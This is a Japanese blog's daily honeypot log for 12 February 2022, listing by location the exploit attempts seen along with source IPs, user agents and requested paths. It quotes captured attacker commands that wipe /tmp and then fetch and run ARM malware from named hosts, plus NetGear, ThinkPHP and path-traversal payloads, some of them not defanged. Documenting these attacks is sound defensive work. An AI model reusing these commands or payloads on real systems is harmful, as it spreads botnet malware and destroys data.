2022/02/12 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/02/12分です。

特徴

共通

/.envへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://23.94.7.175/.s4y/arm;
sh /tmp/arm

cd /tmp;
rm -rf *;
wget net.joostjansen.ml/jaws;
sh /tmp/jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Laravelへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  136.144.41.60/.s4y/arm7;
sh /tmp/arm7

cd /tmp;
rm -rf *;
wget  http://23.94.7.175/.s4y/arm;
sh /tmp/arm

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
okhttpによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://23.94.7.175/.s4y/arm;
sh /tmp/arm

Location:SG

D-link製品の脆弱性を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nucleiによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://23.94.7.175/.s4y/arm;
sh /tmp/arm

他

アクセス数推移

JP：総アクセス数：109 (前日比：17)
US：総アクセス数：62 (前日比：-16)
UK：総アクセス数：496 (前日比：446)
SG：総アクセス数：268 (前日比：167)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	3.145.89.63	United States
1	27.215.110.238	China
1	34.77.162.17	United States
40	34.224.5.167	United States
18	45.95.169.230	Croatia
1	46.101.120.191	United States
1	61.219.11.151	Taiwan
2	64.190.94.19	United States
4	71.6.158.166	United States
2	83.143.86.62	Norway
1	85.202.169.113	Netherlands
1	103.66.208.186	India
1	104.35.176.251	United States
1	109.237.103.9	Russia
17	135.125.217.54	France
1	143.198.105.75	United States
1	143.198.132.167	United States
1	155.4.66.65	Sweden
2	157.245.70.127	United States
1	185.220.101.188	Germany
4	185.254.196.217	Ukraine
1	189.82.250.34	Brazil
1	198.199.105.11	United States
1	199.34.28.75	United States
1	209.17.96.42	United States
1	210.219.180.104	South Korea
1	221.15.127.76	China

UserAgent一覧

件数	UserAgent
15	`-`
1	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
17	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0`
3	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x16\x03\x01\x01\xfa\x01`
1		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
29	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2020/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admincp`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/forum`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]66[.]208[.]186:60134/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shared/.env`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+net[.]joostjansen[.]ml/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	POST	`/cgi-bin/login.cgi`	HTTP/1.1
1	POST	`/result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.106.129.87	United States
1	27.43.206.139	China
1	34.86.35.21	United States
9	45.146.165.37	Russia
5	50.31.21.8	United States
10	51.79.29.48	Canada
1	61.219.11.151	Taiwan
1	83.48.11.9	Spain
2	85.202.169.113	Netherlands
1	90.150.204.80	Russia
1	92.204.187.212	Germany
2	94.232.43.63	Russia
1	96.42.120.196	United States
1	104.136.214.226	United States
1	104.137.47.61	United States
1	143.198.105.75	United States
2	154.127.53.154	Mauritius
2	157.245.70.127	United States
1	162.142.125.219	United States
1	164.68.121.150	Germany
1	167.94.145.59	United States
1	167.248.133.60	United States
1	173.249.10.27	Germany
5	185.254.196.223	Ukraine
6	189.243.102.143	Mexico
1	193.169.254.250	Poland
1	209.17.96.2	United States
1	212.192.241.207	Czechia

UserAgent一覧

件数	UserAgent
18	`-`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.61 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
2		`\x03`
2		`\x16\x03\x01`
22	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/nmaplowercheck1644539869`	HTTP/1.1
1	GET	`/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/pma2021/index.php?lang=en`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 136.144.41.60/.s4y/arm7;sh+/tmp/arm7`
4	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm`
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
132	3.9.22.86	United States
2	20.124.2.234	United States
3	45.137.21.134	Bangladesh
6	45.146.165.37	Russia
5	50.31.21.4	United States
1	61.219.11.151	Taiwan
1	62.171.150.168	Germany
1	64.227.7.33	United States
1	78.186.132.100	Turkey
133	86.91.66.7	Netherlands
2	94.232.43.63	Russia
1	109.92.67.227	Serbia
1	109.237.103.9	Russia
1	109.237.103.123	Russia
1	120.9.216.228	China
1	138.99.248.112	Brazil
196	152.32.216.182	Hong Kong
2	157.245.70.127	United States
1	167.94.146.58	United States
1	167.248.133.60	United States
1	167.248.133.63	United States
1	172.105.89.161	United States
1	178.62.201.109	United States
1	209.17.96.194	United States

UserAgent一覧

件数	UserAgent
91	`-`
1	`Mozila/5.0`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
117	`Mozilla/5.0 (Linux; Android 8.1; EML-L29 Build/HUAWEIEML-L29; xx-xx) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 (iPad; iPhone; CPU iPhone OS 13_2_3 like Mac OS X)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
264	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2`
5	`Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 Safari/602.1`
1	`Mozilla/5.0 Gecko/20100101`
2	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`okhttp/3.3.1`

リクエスト内容一覧

件数	Method	Request	Protocol
78		`-`
2		`\x03`
1		`\x16\x03\x01\x01\xfc\x01`
1		`\x16\x03\x01`
3	GET	`/.env`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
2	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/Application/Buy/Static/js/if.js`	HTTP/1.1
1	GET	`/Content/favicon.ico`	HTTP/1.1
1	GET	`/Css/Hm.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Home/GetAllGameCategory`	HTTP/1.1
1	GET	`/Home/GetInitSource`	HTTP/1.1
1	GET	`/Home/Index/ajaxTJ`	HTTP/1.1
1	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA2012/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA2013/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2014/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2015/index.php?lang=en`	HTTP/1.1
3	GET	`/PMA2016/index.php?lang=en`	HTTP/1.1
5	GET	`/PMA2017/index.php?lang=en`	HTTP/1.1
4	GET	`/PMA2018/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2019/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA2020/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA2021/index.php?lang=en`	HTTP/1.1
1	GET	`/Public/Home/ecshe_css/main.css?v=1543997196`	HTTP/1.1
1	GET	`/Public/Home/js/common.js`	HTTP/1.1
1	GET	`/Public/Wchat/js/cvphp.js`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/Recruit/download_url`	HTTP/1.1
1	GET	`/Templates/user/finance/css/userPay.css`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
4	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
4	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
2	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/pMA/index.php?lang=en`	HTTP/1.1
3	GET	`/admin/phpMyAdmin/index.php?lang=en`	HTTP/1.1
3	GET	`/admin/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/webadmin.php?mod=do&act=login`	HTTP/1.1
3	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
3	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
5	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
1	GET	`/api/app-info`	HTTP/1.1
1	GET	`/api/apps/config`	HTTP/1.1
1	GET	`/api/contactWay`	HTTP/1.1
1	GET	`/api/content_bottom`	HTTP/1.1
1	GET	`/api/home/index`	HTTP/1.1
1	GET	`/api/ht/xy1`	HTTP/1.1
1	GET	`/api/index/grailindex`	HTTP/1.1
1	GET	`/api/linkPF`	HTTP/1.1
1	GET	`/api/pc/configure`	HTTP/1.1
1	GET	`/api/v/index/queryOfficePage?officeCode=customHomeLink`	HTTP/1.1
1	GET	`/api/v1/member/kefu`	HTTP/1.1
1	GET	`/api/wallet/redDetail`	HTTP/1.1
1	GET	`/api/web/user/getIndexData.php`	HTTP/1.1
1	GET	`/appxz/index.html`	HTTP/1.1
1	GET	`/assets/extension/market/css/mt4.css`	HTTP/1.1
1	GET	`/assets/images/mobile/dou_charge_money_icon.png`	HTTP/1.1
1	GET	`/assets/res/mods/room.js`	HTTP/1.1
1	GET	`/base/exchange_index/changepwdfirst`	HTTP/1.1
1	GET	`/common/download.js`	HTTP/1.1
1	GET	`/css/nsc/reset.css`	HTTP/1.1
1	GET	`/css/style.css`	HTTP/1.1
1	GET	`/data/json/config.json`	HTTP/1.1
1	GET	`/database/index.php?lang=en`	HTTP/1.1
3	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
3	GET	`/db/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
3	GET	`/db/index.php?lang=en`	HTTP/1.1
3	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
5	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/doc/script/lib/seajs/config/sea-config.js`	HTTP/1.1
1	GET	`/douyinpay.php?order=20210815173223834`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/fePublicInfo/`	HTTP/1.1
1	GET	`/files/pub_rem.js`	HTTP/1.1
1	GET	`/getLocale`	HTTP/1.1
3	GET	`/h5/`	HTTP/1.1
1	GET	`/h5/static/cert/icon_yanzhengma.png`	HTTP/1.1
1	GET	`/h5/static/tabbar/txl.png`	HTTP/1.1
1	GET	`/h5`	HTTP/1.1
1	GET	`/homes/`	HTTP/1.1
1	GET	`/im/App/config`	HTTP/1.1
1	GET	`/im/h5/`	HTTP/1.1
1	GET	`/im/in/GetUuid`	HTTP/1.1
1	GET	`/images/logo-default-400x46.png`	HTTP/1.1
1	GET	`/index.php/Wap/Api/getBanner`	HTTP/1.1
1	GET	`/index.php/sign`	HTTP/1.1
1	GET	`/index.php?m=api&c=app&a=getPlatformConfig`	HTTP/1.1
1	GET	`/infe/rest/flash/getServerIP.json`	HTTP/1.1
1	GET	`/js/json.js`	HTTP/1.1
1	GET	`/js/post.js/`	HTTP/1.1
1	GET	`/js/pups.js`	HTTP/1.1
1	GET	`/js/tvConfig.js`	HTTP/1.1
1	GET	`/kkrps/im_group/show_members`	HTTP/1.1
1	GET	`/legal/currency/set`	HTTP/1.1
1	GET	`/loan`	HTTP/1.1
1	GET	`/m/`	HTTP/1.1
1	GET	`/m/allticker/1`	HTTP/1.1
1	GET	`/m`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/market/getStockBaseInfo?stockCodeInternal=2658`	HTTP/1.1
1	GET	`/member/js/lang_zh_CN.js`	HTTP/1.1
1	GET	`/mobile/css/base.css`	HTTP/1.1
1	GET	`/mobile/login.html`	HTTP/1.1
1	GET	`/mobile/static/js/pointConfig.js`	HTTP/1.1
1	GET	`/mstock/login`	HTTP/1.1
1	GET	`/myConfig.js`	HTTP/1.1
5	GET	`/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/dbadmin/index.php?lang=en`	HTTP/1.1
4	GET	`/mysql/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
3	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/web/index.php?lang=en`	HTTP/1.1
2	GET	`/mysqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mytio/config/base`	HTTP/1.1
1	GET	`/nmaplowercheck1644520285`	HTTP/1.1
1	GET	`/otc/`	HTTP/1.1
1	GET	`/other/codepay/js/codepay_util.js`	HTTP/1.1
1	GET	`/pages/index/index`	HTTP/1.1
2	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
3	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-4.9.7-english/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.0-english/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-5.1.1-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin/index.php?lang=en`	HTTP/1.1
4	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin4/index.php?lang=en`	HTTP/1.1
3	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin_/index.php?lang=en`	HTTP/1.1
4	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmy-admin/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
6	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2012/index.php?lang=en`	HTTP/1.1
4	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2014/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2016/index.php?lang=en`	HTTP/1.1
3	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
4	GET	`/phpmyadmin2019/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin_/index.php?lang=en`	HTTP/1.1
2	GET	`/phppma/index.php?lang=en`	HTTP/1.1
1	GET	`/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/pma2011/index.php?lang=en`	HTTP/1.1
4	GET	`/pma2012/index.php?lang=en`	HTTP/1.1
3	GET	`/pma2013/index.php?lang=en`	HTTP/1.1
1	GET	`/pma2014/index.php?lang=en`	HTTP/1.1
2	GET	`/pma2015/index.php?lang=en`	HTTP/1.1
3	GET	`/pma2016/index.php?lang=en`	HTTP/1.1
3	GET	`/pma2017/index.php?lang=en`	HTTP/1.1
2	GET	`/pma2018/index.php?lang=en`	HTTP/1.1
4	GET	`/pma2021/index.php?lang=en`	HTTP/1.1
1	GET	`/program/index.php?lang=en`	HTTP/1.1
1	GET	`/proxy/games`	HTTP/1.1
1	GET	`/proxy/settings`	HTTP/1.1
1	GET	`/public/css/style.css`	HTTP/1.1
1	GET	`/public/h5static/js/main.js`	HTTP/1.1
1	GET	`/public/img/cz1.png`	HTTP/1.1
1	GET	`/public/wap/js/basis.js`	HTTP/1.1
1	GET	`/public/web/css/add//index[.]css`	HTTP/1.1
1	GET	`/reg.php`	HTTP/1.1
1	GET	`/resources/css/headernav.css`	HTTP/1.1
1	GET	`/s_api/basic/download/info`	HTTP/1.1
1	GET	`/service?action=getBasicInfo&terminal_id=2&token=&debug=true`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//120[.]9[.]216[.]228:38063/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm`
2	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
3	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin4/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
5	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/websql/index.php?lang=en`	HTTP/1.1
1	GET	`/static/common/js/common.js`	HTTP/1.1
1	GET	`/static/common/js/global.js`	HTTP/1.1
1	GET	`/static/data/configjs.js`	HTTP/1.1
